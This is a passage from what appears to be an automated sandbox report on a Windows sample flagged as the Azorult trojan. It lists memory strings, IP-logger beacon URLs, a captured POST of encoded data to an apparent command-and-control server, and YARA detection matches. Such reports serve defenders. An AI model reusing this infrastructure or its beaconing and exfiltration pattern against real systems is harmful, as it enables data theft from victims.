                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.00000000048A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Roboto:wght
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.iplogger.org/?a=add
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.iplogger.org/?a=add&amp;category=2
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.iplogger.org/knowledgebase.php?categor
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.iplogger.org/knowledgebase.php?category=2
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340289325.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384294738.00000000048D9000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337052630.00000000048D3000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342430878.00000000048D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340289325.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1nFPF4.png
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337052630.00000000048D3000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342430878.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384294738.00000000048D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/A
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337052630.00000000048D3000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342430878.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384294738.00000000048D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/_
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384153935.00000000048CF000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337288125.00000000048CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/csp.php;
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384153935.00000000048CF000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337288125.00000000048CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/csp.php;Persistent-AuthWWW-AuthenticateVaryturnback=info%2Funknown%2F1dHC37%2F;
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/invisible/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/ip-services/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/ip-tracker/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/location-tracker/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/mac-checker/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/my-ip/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.00000000048A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/privacy/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.00000000048A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/rules/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/shortener/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/sms-logger/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/speedtest/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.000000000490C000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/unknown/2no.co/1dHC37/unknown
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337029009.0000000004913000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004909000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.000000000490C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/unknown/2no.co/1dHC37/unknownLocationETagAuthentication-InfoAgeAccept-RangesLas
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/unknown/2no.co/1dHC37/unknownkk
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/url-checker/
                      Source: ChameleonExplorer.exe, 00000006.00000002.326211855.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neosoft-activator.appspot.com/
                      Source: ChameleonExplorer.exe, 00000006.00000002.326211855.00000000014A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neosoft-activator.appspot.com/activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF20
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=com.iplogger.android.free&utm_source=site&utm_campaign
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/iplogger_team
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/iplogger_team
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wl.gl/app
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wl.gl/tg
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/r/IPLogger_Team/
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: https://www.startssl.com/policy0
                      Source: unknown; DNS traffic detected: queries for: 2no.co
                      Source: global traffic; HTTP traffic detected:
                          GET /1dHC37 HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 2no.co
                      Source: global traffic; HTTP traffic detected:
                          GET /unknown/2no.co/1dHC37/unknown HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: iplogger.org
                      Source: global traffic; HTTP traffic detected:
                          GET /activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF206F2697DB14BB5EE90B3A8D-DEE4D6E40AA7315F07804DDD9503F87B-E102E85C5423062DBFF8920ECFD0E53F-7E632307063B35A85D7B937531F0F205-DA23DD2618B7306B8B24495E8B2916C0&vrs=3.0.0.505&prg=explorer&uid=c59b80ec3e93e3d2a7920d213840ce6b HTTP/1.1
                          User-Agent: Chameleon Checker NextGen2 (Ver: 3.0.0.505)
                          Host: neosoft-activator.appspot.com
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected:
                          GET /static/?category=install&action=install&label=paid&uid=&prg=explorer HTTP/1.1
                          User-Agent: Chameleon Static (Ver: 3.0.0.505)
                          Host: www.chameleon-managers.com
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected:
                          GET /info/versions/ HTTP/1.1
                          User-Agent: Chameleon checker ( Ver: 3.0.0.505)
                          Host: www.chameleon-managers.com
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: unknown; Network traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknown; Network traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknown; Network traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49701
                      Source: global traffic; HTTP traffic detected:
                          HTTP/1.1 404 Not Found
                          Server: nginx/1.4.5
                          Date: Wed, 22 Feb 2023 07:09:18 GMT
                          Content-Length: 0
                          Connection: close
                      Source: global traffic; HTTP traffic detected:
                          HTTP/1.1 404 Not Found
                          Server: nginx/1.4.5
                          Date: Wed, 22 Feb 2023 07:09:19 GMT
                          Content-Length: 0
                          Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a class="footer__social-i fb" href="https://www.facebook.com/iploggerteam" title="Follow us on Facebook" target="_blank"><span class="soc-ico"></span></a> equals www.facebook.com (Facebook)
                      Source: unknownHTTP traffic detected: POST /1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 51.15.219.86Content-Length: 109Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 3f 2f fb 3e 2f fb 3c 2f fb 3f 2f fb 34 4e 8b 28 38 8c 28 39 ff 28 39 ff 28 39 f8 28 39 fa 28 39 fe 28 39 fd 28 39 f9 4c 2f fb 34 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/?/>/</?/4N(8(9(9(9(9(9(9(9L/4
                      Source: unknownHTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.184.84:443 -> 192.168.2.3:49705 version: TLS 1.2
                      Source: update.exe, 00000003.00000002.361318770.00000000007EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: User32.DLLGetRawInputDeviceInfoAGetRawInputBufferGetRawInputDataGetRawInputDeviceListRegisterRawInputDevicesGetRegisteredRawInputDevices
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeWindows user hook set: 0 mouse C:\Program Files (x86)\Chameleon Explorer\Folder.dll

                      System Summary

                      Source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                      Source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                      Source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                      Source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                      Source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.344437354.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.344437354.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05627F102_2_05627F10
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 16_2_03427F1016_2_03427F10
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: folder.dll
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: folder64.dll
                      Source: is-LI6V8.tmp.2.drStatic PE information: Number of sections : 11 > 10
                      Source: is-EV8UG.tmp.2.drStatic PE information: Number of sections : 11 > 10
                      Source: is-7RNBS.tmp.2.drStatic PE information: Number of sections : 11 > 10
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy) 9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy) 137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy) 3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
